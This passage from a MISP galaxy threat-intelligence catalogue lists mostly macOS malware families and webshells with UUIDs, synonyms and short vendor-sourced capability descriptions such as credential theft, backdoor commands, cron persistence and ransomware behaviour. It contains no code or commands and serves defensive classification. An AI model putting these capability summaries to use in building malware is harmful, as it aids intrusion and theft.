External references
Associated metadata
Metadata key Value
type []

FriendlyFerret

Internal MISP references

UUID 55d9ec38-aba4-4049-a98e-0f3289b17477 which can be used as unique global reference for FriendlyFerret in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FrigidStealer

According to Proofpoint, FrigidStealer FrigidStealer uses Apple script files and osascript to prompt the user to enter their password, and then to gather data including browser cookies, files with extensions relevant to password material or cryptocurrency from the victim’s Desktop and Documents folders, and any Apple Notes the user has created.

Internal MISP references

UUID 0656f9e1-9606-42b4-9198-114d55e05a17 which can be used as unique global reference for FrigidStealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FrostyFerret

Internal MISP references

UUID 3f8caa3d-63ed-4140-b8b1-d290936730da which can be used as unique global reference for FrostyFerret in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FruitFly

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FruitFly.

Known Synonyms
Quimitchin
Internal MISP references

UUID a517cdd1-6c82-4b29-bdd2-87e281227597 which can be used as unique global reference for FruitFly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FULLHOUSE

Fullhouse (AKA FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. Fullhouse is written in C/C++ and includes the capabilities of a tunneler and backdoor commands support such as shell command execution, file transfer, file managment, and process injection. C2 communications occur via HTTP and require configuration through the command line or a configuration file.

Internal MISP references

UUID 2ab781d8-214d-41e2-acc9-23ded4f77663 which can be used as unique global reference for FULLHOUSE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GIMMICK (OS X)

This multi-platform malware is a ObjectiveC written macOS variant dubbed GIMMICK by Volexity. This malware is a file-based C2 implant used by Storm Cloud.

Internal MISP references

UUID 0e259d0f-717a-4ced-ac58-6fe9d72e2c96 which can be used as unique global reference for GIMMICK (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gmera

According to PCrisk, GMERA (also known as Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app created for Mac users.

Research shows that there are two variants of this malware, one detected as Trojan.MacOS.GMERA.A and the other as Trojan.MacOS.GMERA.B. Cyber criminals proliferate GMERA to steal various information and upload it to a website under their control. To avoid damage caused by this malware, remove GMERA immediately.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gmera.

Known Synonyms
Kassi
StockSteal
Internal MISP references

UUID 1c65cf4e-5df4-4d56-a414-7b05f00814ba which can be used as unique global reference for Gmera in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GolangGhost (OS X)

Internal MISP references

UUID 1f8b4aac-fc57-4f66-8b03-bbf279f417e9 which can be used as unique global reference for GolangGhost (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HiddenLotus

According to Malwarebytes, The HiddenLotus "dropper" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.

Internal MISP references

UUID fc17e41f-e9f7-4442-a05c-7a19b9174c39 which can be used as unique global reference for HiddenLotus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HLOADER

Internal MISP references

UUID 28304d68-689e-4488-80cb-d5b7b50a8d57 which can be used as unique global reference for HLOADER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HZ RAT (OS X)

Internal MISP references

UUID 37f37678-c8c3-44d7-82bd-ecb452fba012 which can be used as unique global reference for HZ RAT (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

iMuler

The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:

  • capture screenshots
  • exfiltrate files to a remote computer
  • send various information about the infected computer
  • extract ZIP archive
  • download files from a remote computer and/or the Internet
  • run executable files
Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular iMuler.

Known Synonyms
Revir
Internal MISP references

UUID 261fd543-60e4-470f-af28-7a9b17ba4759 which can be used as unique global reference for iMuler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Interception (OS X)

Internal MISP references

UUID d4f7ea92-04e7-405c-9faf-7993ffd5c473 which can be used as unique global reference for Interception (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Janicab (OS X)

According to Patrick Wardle, this malware persists a python script as a cron job. Steps: 1. Python installer first saves any existing cron jobs into a temporary file named '/tmp/dump'. 2. Appends its new job to this file. 3. Once the new cron job has been added 'python (~/.t/runner.pyc)' runs every minute.

Internal MISP references

UUID 01325d85-297f-40d5-b829-df9bd996af5a which can be used as unique global reference for Janicab (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JokerSpy

Internal MISP references

UUID 171b0695-8cea-4ca6-a3f0-c9a8455ef9de which can be used as unique global reference for JokerSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KANDYKORN

Internal MISP references

UUID d314856b-1c07-4f4a-ab3e-eeae38536857 which can be used as unique global reference for KANDYKORN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KeRanger

Internal MISP references

UUID 01643bc9-bd61-42e8-b9f1-5fbf83dcd786 which can be used as unique global reference for KeRanger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Keydnap

Internal MISP references

UUID 2173605b-bf44-4c76-b75a-09c53bb322d6 which can be used as unique global reference for Keydnap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KeySteal

According to SentinelOne, KeySteal targets files with the .keychain and keychain-db file extensions in the following locations.

Internal MISP references

UUID 53f359ed-6178-4d9e-958f-e79d5d4b3655 which can be used as unique global reference for KeySteal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kitmos

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kitmos.

Known Synonyms
KitM
Internal MISP references

UUID 8a1b1c99-c149-4339-9058-db3b4084cdcd which can be used as unique global reference for Kitmos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Komplex

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Komplex.

Known Synonyms
JHUHUGIT
JKEYSKW
SedUploader
Internal MISP references

UUID d26b5518-8d7f-41a6-b539-231e4962853e which can be used as unique global reference for Komplex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kuiper (OS X)

Internal MISP references

UUID c39087ca-05b7-4374-aff1-116a73f2ba74 which can be used as unique global reference for Kuiper (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lador

Internal MISP references

UUID 9c6b54ce-44a0-4d0c-89cb-6532c8f89d8d which can be used as unique global reference for Lador in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lambert (OS X)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lambert (OS X).

Known Synonyms
GreenLambert
Internal MISP references

UUID 7433f3a8-f53c-4ba0-beff-e312fae9ad39 which can be used as unique global reference for Lambert (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Laoshu

Internal MISP references

UUID a13a2cb8-b0e6-483a-9916-f44969a2c42b which can be used as unique global reference for Laoshu in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Leverage

Internal MISP references

UUID 15daa766-f721-4fd5-95fb-153f5361fb87 which can be used as unique global reference for Leverage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LockBit (OS X)

Internal MISP references

UUID 0821b5c8-db48-4d0e-a969-384dbd74a6c9 which can be used as unique global reference for LockBit (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MacDownloader

Internal MISP references

UUID 910d3c78-1a9e-4600-a3ea-4aa5563f0f13 which can be used as unique global reference for MacDownloader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MacInstaller

Internal MISP references

UUID d1f8af3c-719b-4f64-961b-8d89a2defa02 which can be used as unique global reference for MacInstaller in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MacRansom

Internal MISP references

UUID 66862f1a-5823-4a9a-bd80-439aaafc1d8b which can be used as unique global reference for MacRansom in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MacSpy

Internal MISP references

UUID c9915d41-d1fb-45bc-997e-5cd9c573d8e7 which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MacVX

Internal MISP references

UUID 4db9012b-d3a1-4f19-935c-4dbc7fdd93fe which can be used as unique global reference for MacVX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MaMi

Internal MISP references

UUID 7759534c-3298-42e9-adab-896d7e507f4f which can be used as unique global reference for MaMi in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Manuscrypt

Internal MISP references

UUID f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7 which can be used as unique global reference for Manuscrypt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mokes (OS X)

Internal MISP references

UUID bfbb6e5a-32dc-4842-936c-5d8497570c74 which can be used as unique global reference for Mokes (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mughthesec

Internal MISP references

UUID aa1bf4e5-9c44-42a2-84e5-7526e4349405 which can be used as unique global reference for Mughthesec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NetWire

Internal MISP references

UUID f0d52afd-e7c9-4bd1-be8a-9ab09b14ea24 which can be used as unique global reference for NetWire in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OceanLotus

According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.

The OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).

Internal MISP references

UUID 65b7eff4-741c-445e-b4e0-8a4e4f673a65 which can be used as unique global reference for OceanLotus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Odyssey Stealer

Internal MISP references

UUID 361fe0b4-30b2-4b4f-a2d4-a7ad1a052056 which can be used as unique global reference for Odyssey Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Olyx

Internal MISP references

UUID cd397973-8f42-4c49-8322-414ea77ec773 which can be used as unique global reference for Olyx in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

oRAT

SentinelOne describes this as a malware written in Go, mixing own custom code with code from public repositories.

Internal MISP references

UUID 699dac0f-092c-4c8e-85e9-6e3c86129190 which can be used as unique global reference for oRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OSAMiner

Internal MISP references

UUID 89d0c423-c4ff-46e8-8c79-ea5e974e53e7 which can be used as unique global reference for OSAMiner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Patcher

This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.

The downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.

The file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user's files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user's directories.

Despite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Patcher.

Known Synonyms
FileCoder
Findzip
Internal MISP references

UUID bad1057c-4f92-4747-a0ec-31bcc062dab8 which can be used as unique global reference for Patcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pearl Stealer

Internal MISP references

UUID d255cff1-5a66-45fe-8cd7-49218b50a572 which can be used as unique global reference for Pearl Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PintSized

Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.

Internal MISP references

UUID de13bec0-f443-4c5a-91fe-2223dad43be5 which can be used as unique global reference for PintSized in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pirrit

Internal MISP references

UUID b749ff3a-df68-4b38-91f1-649864eae52c which can be used as unique global reference for Pirrit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POOLRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POOLRAT.

Known Synonyms
SIMPLESEA
SIMPLETEA
Internal MISP references

UUID bfd9e30e-ddc7-426f-8f77-4d2e1a846541 which can be used as unique global reference for POOLRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Poseidon (OS X)

Part of Mythic C2, written in Golang.

Internal MISP references

UUID e4ac9105-c3ad-41e2-846b-048e2bbedc6a which can be used as unique global reference for Poseidon (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Poseidon Stealer

macOS infostealer sold by an individual named Rodrigo4, currently consisting of a disk image containing a Mach-O without app bundle, which when executed spawns osascript executing an AppleScript with the actual infostealer payload. The AppleScript payload will steal files by packing them in a ZIP archive and uploading them to a hardcoded C2 via HTTP.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poseidon Stealer.

Known Synonyms
Rodrigo Stealer
Internal MISP references

UUID 9eb9f899-acfb-4452-981f-5937aa1f47cc which can be used as unique global reference for Poseidon Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Proton RAT

Proton RAT is a Remote Access Trojan (RAT) specifically designed for macOS systems. It is known for providing attackers with complete remote control over the infected system, allowing the execution of commands, keystroke capturing, access to the camera and microphone, and the ability to steal credentials stored in browsers and other password managers. This malware typically spreads through malicious or modified applications, which, when downloaded and installed by unsuspecting users, trigger its payload. Proton RAT is notorious for its sophistication and evasion capabilities, including techniques to bypass detection by installed security solutions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Proton RAT.

Known Synonyms
Calisto
Internal MISP references

UUID d7e31f19-8bf2-4def-8761-6c5bf7feaa44 which can be used as unique global reference for Proton RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pureland

According to SentinelOne, this is an infostealer, targeting among other things the encrypted database of Zoom.

Internal MISP references

UUID ffacfa02-47f5-4287-a700-243e3d4f8d6d which can be used as unique global reference for Pureland in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pwnet

Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.

Internal MISP references

UUID 70059ec2-9315-4af7-b65b-2ec35676a7bb which can be used as unique global reference for Pwnet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dok

Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dok.

Known Synonyms
Retefe
Internal MISP references

UUID 80acc956-d418-42e3-bddf-078695a01289 which can be used as unique global reference for Dok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RustBucket (OS X)

Internal MISP references

UUID 03f356e6-296f-4195-bed0-9719a84887db which can be used as unique global reference for RustBucket (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Shlayer

According to PCrisk, Shlayer is a trojan-type virus designed to proliferate various adware and other unwanted applications, and promote fake search engines. It is typically disguised as a Adobe Flash Player installer and various software cracking tools.

In most cases, users encounter this virus when visiting dubious Torrent websites that are full of intrusive advertisements and deceptive downloads.

Internal MISP references

UUID c3ee82df-a004-4c68-89bd-eb4bb2dfc803 which can be used as unique global reference for Shlayer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Silver Sparrow

According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.

Internal MISP references

UUID f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c which can be used as unique global reference for Silver Sparrow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SimpleTea (OS X)

SimpleTea is a RAT for macOS that is based on the same object-oriented project as SimpleTea for Linux (SimplexTea).

It also shares similarities with POOLRAT (also known as SIMPLESEA), like the supported commands or a single-byte XOR encryption of its configuration. However, the indices of commands are different.

SimpleTea for macOS was uploaded to VirusTotal from Hong Kong and China in September 2023.

Internal MISP references

UUID ce384804-8580-4d57-97b3-bde0d903f703 which can be used as unique global reference for SimpleTea (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpectralBlur (OS X)

Internal MISP references

UUID c7c32006-a2d1-4bc2-8a25-84c07286464a which can be used as unique global reference for SpectralBlur (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SUGARLOADER

Internal MISP references

UUID 171501fd-d504-4257-9c3d-fbc066d6eeba which can be used as unique global reference for SUGARLOADER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SysJoker (OS X)

Internal MISP references

UUID 5bffe0fe-22f6-4d18-9372-f8c5d262d852 which can be used as unique global reference for SysJoker (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

systemd

General purpose backdoor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular systemd.

Known Synonyms
Demsty
ReverseWindow
Internal MISP references

UUID a8e7687b-9db7-4606-ba81-320d36099e3a which can be used as unique global reference for systemd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Tsunami (OS X)

Internal MISP references

UUID 59d4a2f3-c66e-4576-80ab-e04a4b0a4317 which can be used as unique global reference for Tsunami (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified macOS 001 (UnionCryptoTrader)

Internal MISP references

UUID 1c96f6b9-6b78-4137-9d5f-aa5575f80daa which can be used as unique global reference for Unidentified macOS 001 (UnionCryptoTrader) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

UpdateAgent

Internal MISP references

UUID 1f1bc885-5987-41fa-bb04-8775eeb45d88 which can be used as unique global reference for UpdateAgent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Uroburos (OS X)

Internal MISP references

UUID 13173d75-45f0-4183-8e18-554a5781405c which can be used as unique global reference for Uroburos (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Vigram

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vigram.

Known Synonyms
WizardUpdate
Internal MISP references

UUID 021e2fb4-1744-4fde-8d59-b247f1b34062 which can be used as unique global reference for Vigram in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WatchCat

Internal MISP references

UUID a73468d5-2dee-4828-8bbb-c37ea9295584 which can be used as unique global reference for WatchCat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WindTail

Internal MISP references

UUID 48751182-0b17-4326-8a72-41e4c4be35e7 which can be used as unique global reference for WindTail in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Winnti (OS X)

Internal MISP references

UUID 5aede44b-1a30-4062-bb97-ac9f4985ddb6 which can be used as unique global reference for Winnti (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WireLurker (OS X)

Internal MISP references

UUID bc32df24-8e80-44bc-80b0-6a4d55661aa5 which can be used as unique global reference for WireLurker (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Wirenet (OS X)

Internal MISP references

UUID f99ef0dc-9e96-42e0-bbfe-3616b3786629 which can be used as unique global reference for Wirenet (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

X-Agent (OS X)

Internal MISP references

UUID 858f4396-8bc9-4df8-9370-490bbb3b4535 which can be used as unique global reference for X-Agent (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

XCSSET

Internal MISP references

UUID 041aee7f-cb7a-4199-9fe5-494801a18273 which can be used as unique global reference for XCSSET in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Xloader

Xloader is a Rebranding of Formbook malware (mainly a stealer), available for macOS as well.

Formbook has a "magic"-value FBNG (FormBook-NG), while Xloader has a "magic"-value XLNG (XLoader-NG). This "magic"-value XLNG is platform-independent.

Not to be confused with apk.xloader or ios.xloader.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xloader.

Known Synonyms
Formbook
Internal MISP references

UUID d5f2f6ad-2ed0-42d4-9116-f95eea2ab543 which can be used as unique global reference for Xloader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

XSLCmd

Internal MISP references

UUID 120a5890-dc3e-42e8-950e-b5ff9a849d2a which can be used as unique global reference for XSLCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Yort

Internal MISP references

UUID 725cd3eb-1025-4da3-bcb1-a7b6591c632b which can be used as unique global reference for Yort in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ZuRu

A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system an pulls additional payload(s).

Internal MISP references

UUID bd293592-d2dd-4fdd-88e7-6098e0bbb043 which can be used as unique global reference for ZuRu in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ani-Shell

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ani-Shell.

Known Synonyms
anishell
Internal MISP references

UUID 7ef3c0fd-8736-47b1-8ced-ca7bf6d27471 which can be used as unique global reference for Ani-Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ANTAK

Antak is a webshell written in ASP.Net which utilizes PowerShell.

Internal MISP references

UUID 88a71ca8-d99f-416a-ad29-5af12212008c which can be used as unique global reference for ANTAK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ASPXSpy

ASPXSpy is an open-source web shell written in C# that allows a threat actor to accomplish various post-exploitation tasks, including file access and command execution.

Internal MISP references

UUID 4d1c01be-76ad-42dd-b094-7a8dbaf02159 which can be used as unique global reference for ASPXSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Behinder

A webshell for multiple web languages (asp/aspx, jsp/jspx, php), openly distributed through Github.

Internal MISP references

UUID 5e5cd3a6-0348-4c6b-94b1-13ca0d845547 which can be used as unique global reference for Behinder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

c99shell

C99shell is a PHP backdoor that provides a lot of functionality, for example:

  • run shell commands;
  • download/upload files from and to the server (FTP functionality);
  • full access to all files on the hard disk;
  • self-delete functionality.
Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular c99shell.

Known Synonyms
c99
Internal MISP references

UUID cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2 which can be used as unique global reference for c99shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DEWMODE

FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance. It is a PHP webshell that allows threat actors to view and download files in the victim machine. It also contains cleanup function to remove itself and clean the Apache log.

Internal MISP references

UUID a782aac8-168d-4691-a182-237d7d473e21 which can be used as unique global reference for DEWMODE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DollyWay

PHP/JavaScript malware for WordPress that injects multi-stage scripts, turning compromised sites into distributed TDS/C2 nodes. Delivers signed payloads, maintains persistence via helper files, and redirects traffic to monetized scam networks.

Internal MISP references

UUID 13674aff-3746-4c5b-827f-ea2779874942 which can be used as unique global reference for DollyWay in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ensikology

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ensikology.

Known Synonyms
Ensiko
Internal MISP references

UUID dfd8deac-ce86-4a22-b462-041c19d62506 which can be used as unique global reference for Ensikology in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Glutton

According to Xlab, Glutton is a modular PHP fileless attack framework, capable of data exfiltration and running backdoors.

Internal MISP references

UUID 2e55f9ec-2fce-401b-81fe-e98692a97eb6 which can be used as unique global reference for Glutton in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

p0wnyshell

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular p0wnyshell.

Known Synonyms
Ponyshell
Pownyshell
Internal MISP references

UUID a6d13ffe-1b1a-46fe-afd9-989e8dec3773 which can be used as unique global reference for p0wnyshell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Parrot TDS WebShell

In combination with Parrot TDS the usage of a classical web shell was observed by DECODED Avast.io.

Internal MISP references

UUID c9e7c5a6-9082-47ec-89eb-477980e73dcb which can be used as unique global reference for Parrot TDS WebShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PAS

Internal MISP references

UUID e6a40fa2-f79f-40e9-89d3-a56984bc51f7 which can be used as unique global reference for PAS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Prometheus Backdoor

Backdoor written in php

Internal MISP references

UUID b4007b02-106d-420f-af1c-76c035843fd2 which can be used as unique global reference for Prometheus Backdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PS1Bot

According to Cisco Talos, this is multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules including an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in-memory, without requiring them to be written to disk. Due to similarities in the design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”

Internal MISP references

UUID 188c4fae-bd59-4470-81b9-63dba44c7986 which can be used as unique global reference for PS1Bot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RedHat Hacker WebShell

Internal MISP references

UUID e94a5b44-f2c2-41dc-8abb-6de69eb38241 which can be used as unique global reference for RedHat Hacker WebShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

php.shin_webshell

A PHP webshell that allows file system management, data exfiltration and command execution.

Internal MISP references

UUID cbf8e4b6-2555-447d-a37e-ff407668b311 which can be used as unique global reference for php.shin_webshell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WSO

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WSO.

Known Synonyms
Webshell by Orb
Internal MISP references

UUID 7f3794fc-662e-4dde-b793-49bcaccc96f7 which can be used as unique global reference for WSO in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Silence DDoS

Internal MISP references

UUID b5cc7a39-305b-487e-b15a-02dcebefce90 which can be used as unique global reference for Silence DDoS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BlackSun

Ransomware.

Internal MISP references

UUID 1fcc4425-6e14-47e6-8434-745cf1bc9982 which can be used as unique global reference for BlackSun in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BONDUPDATER

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BONDUPDATER.

Known Synonyms
Glimpse
Poison Frog
Internal MISP references

UUID 99600ba5-30a0-4ac8-8583-6288760b77c3 which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CASHY200

Internal MISP references

UUID 7373c789-2dc2-4867-9c60-fa68f8d971a2 which can be used as unique global reference for CASHY200 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

COOKBOX

